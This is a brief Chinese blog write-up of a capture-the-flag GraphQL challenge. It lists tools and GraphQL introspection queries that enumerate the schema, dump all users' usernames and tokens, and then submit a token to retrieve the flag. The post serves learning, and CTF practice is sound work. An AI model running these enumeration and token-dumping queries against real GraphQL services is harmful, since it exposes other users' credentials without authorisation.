文章目錄
- 前言
- 一、工具和使用網址
- 二、具體payload
- 總結
前言
最近去看了看國外的題目,給打蒙了,第一道最簡單的不會做,唉o(╥﹏╥)o,是一道關于GraphQL的題目,以前完全沒接觸過啊,一開始找到了突破點,但是一直在burpsuit嘗試,這是條錯誤的道路啊啊啊啊,後面才了解到需要GraphQL有自己的内省查詢,可以使用它的工具,啊啊啊啊,活到老學到老。
一、工具和使用網址
Introspection-GraphQL
《解析 GraphQL 的查詢文法》【譯】
GraphiQL查詢工具
YouTube一位大神相關的做題視訊
詳細題解
二、具體payload
{
__schema {
types {
name
}
}
}
{
__schema {
queryType {
name
}
}
}
{
__type(name: "User") {
name
kind
}
}
{
__type(name: "Droid") {
name
fields {
name
type {
name
kind
ofType {
name
kind
}
}
}
}
}
{
users {
username
token
}
}
{
flag(token: "3cd3a50e63b3cb0a69cfb7d9d4f0ebc1dc1b94143475535930fa3db6e687280b")
}
總結
活到老學到老!!!!
![web OS —— goowy.com[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)